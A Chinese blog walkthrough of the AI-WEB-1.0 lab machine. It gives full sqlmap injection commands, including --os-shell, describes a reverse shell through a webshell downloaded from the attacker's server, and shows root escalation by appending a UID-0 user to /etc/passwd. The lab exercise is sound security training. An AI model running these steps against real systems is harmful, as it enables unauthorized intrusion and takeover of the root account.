首页 > 其他分享 >AI-WEB-1.0靶机

AI-WEB-1.0靶机

时间:2024-01-25 19:44:07浏览次数:29  
标签:WEB 1.0 AI 192.168 python -- http se3reTdir777 salt

AI-WEB-1.0靶机

情报收集

扫描靶机,打开网站提示
Not even Google search my contents!

image-20240125170912534

dirb http://192.168.218.139
扫描网站 进入爬虫协议

image-20240125171146057

User-agent: *
Disallow: 
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
进入两个网站都报错,dirb再次扫描两个网站

image-20240125172031862

image-20240125172359934

打开网站
收集到网站根目录
/home/www/html/web1x443290o2sdf92213
打开另一个
尝试SQL注入,可以

image-20240125172440522

image-20240125172539582

漏洞利用

使用sqlmap进行注入,先bp抓包找到注入点
uid=1&Operation=Submit

image-20240125172743864

python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" --dbs
--data 用于指定post请求的数据
--batch 默认选项
--dbs 列出所有数据库名
--dump:用于从数据库表中提取数据
--columns:用于列出选定数据库表中的所有列
--tables:用于列出选定数据库中的所有表
--level=3 进行全面测试,包括数据库指纹识别、枚举和数据提取等
--os-shell 尝试获取操作系统 shell

image-20240125173433764

python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" -D aiweb1 --tables

image-20240125180614779

python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

image-20240125181627772

没找到有用信息
python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell

image-20240125182026248

4
2
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
成功反弹shell

image-20240125191812535

提权

在kali机新建webshell.php文件
IP是kali攻击机的,端口是监听端口

image-20240125191930994

python -m http.server 2222
python搭建简单服务器
靶机下载文件

image-20240125192232594

开启监听
运行文件即可成功反弹

image-20240125192303229

有时候一次不行,多试几次
使用python转换成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

image-20240125192517706

使用工具openssl功能,对密码加密,写入/etc/pass需要加密形式
openssl passwd -1 -salt web1 123456
-1:表示采用的是MD5加密算法
-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串
写入密码
echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
切换用户
su web1
id显示root
攻破

image-20240125193542625

标签:WEB,1.0,AI,192.168,python,--,http,se3reTdir777,salt
From: https://www.cnblogs.com/yang-ace/p/17988012

相关文章

  • MySQL SQL点查,范围查,排序,分组的Explain分析和SQL优化(8.0版本)
    MySQLSQL常用优化主要有where,range,order,groupby,or等查询。下图是优化的原则,后面会有一个例子来看看:比如建立了联合索引(c1,c2,c3),索引长度分别为5,5,4。数据有50条:点查SELECT*FROMtraining.t1wherec3=1andc2=1andc1=1;使用了索引,只要全部包含索引列,那么点查顺序......
  • Python web crawler(2.1)多循环嵌套练习
    写个函数,传入(书名:book,标题:tittle,内容:content),要求在book文件夹下(不存在则创建),创建每个tittle.txt文件,写入content内容importosdefsave_to_file(folder_book,title,content):#如果文件夹不存在,则创建ifnotos.path.exists(folder_book):os.makedirs(......
  • Web前端性能优化
    性能优化是前端开发无法避免的点,给客户带去良好的访问体验也是开发人员必须关注的问题。前端性能优化大体分为两个部分:代码优化、资源及其他优化,本文主要记录资源及其他优化要怎么做。1、CSS样式文件在页面头部引入,Javascript文件在页面尾部引入页面加载单线程可能会阻塞页面的......
  • 解决 fatal: unable to access 'https://github.com/alibaba/nacos.git/': Failed to
    直接打开这个网站:https://sites.ipaddress.com/github.com/。找到网站中的IP地址复制出里面的IPAddress并粘贴到hosts里面。以下是macos上使用命令行打开方式,也可以直接在硬盘上找到这个文件打开sudovim/private/etc/hosts在最后一行添加如下代码140.82.113.4githu......
  • scheduler报错: Failed to watch *v1beta1.PodDisruptionBudget: failed to list *v1b
    问题Failedtowatch*v1beta1.PodDisruptionBudget:failedtolist*v1beta1.PodDisruptionBudget:theservercouldnotfindtherequestedresourcenokind"KubeSchedulerConfiguration"isregisteredforversion"componentconfig/v1alpha1"......
  • 行业应用 | Sophon AutoCV推动AI应用从模型生产到高效落地
    随着技术市场和应用方向的逐渐成熟,人工智能与各行各业的结合和落地逐渐进入了深水区。虽然由于行业规模化和应用普及度的限制,人工智能在“传统”行业的落地不如消费互联网行业,但是借助人工智能为“传统”行业的发展注入新能量一直是相关从业者探索的方向和创造数据价值的重要途径。......
  • websocket 包括心跳机制
    https://zhuanlan.zhihu.com/p/6643681141.创建websocket对象,初始化创建对象,开启、onmsg、关闭开启,开始心跳检测发送传递信息(ifwebsocket对象存在,且处于open状态onmsg,接收服务器传送过来的信息,进行业务操作关闭,销毁心跳检测,清除心跳......
  • APISIX同时代理websocket和http请求 websocket无法正常工作
    1.配置了一个路由同时代理websocket和http请求 2.打开了websocket支持,websocket还是无法工作  3.定位3.1通过postman分别走apisix和不经过apisix建立websocet连接,发现经过apisix也能成功建立连接,但是10秒左右就自己断开了。  3.2思考3.3决定试一下是否和超时配置......
  • 前端工程化解决方案webpack使用小结
    前端工程化解决方案webpack,模块化、组件化、规范化、自动化,使得前端开发更加高效。功能:代码压缩混淆、处理浏览器端js的兼容性、以模块化的方式处理项目中的资源webpack插件:clean-webpack-plugin清除dist文件夹之前打包生成的文件使用步骤:先安装 再在webpac......
  • Airtest-Selenium实操小课③:下载可爱猫猫图片
    此文章来源于项目官方公众号:“AirtestProject”版权声明:允许转载,但转载必须保留原链接;请勿用作商业或者非法用途1.前言上次实操小课分享,我们分享了如何使用Airtest-selenium实现自动化刷B站,还没看的同学可以戳这里回顾一下~那么这周我们看看如何实现使用Airtest-Selenium实......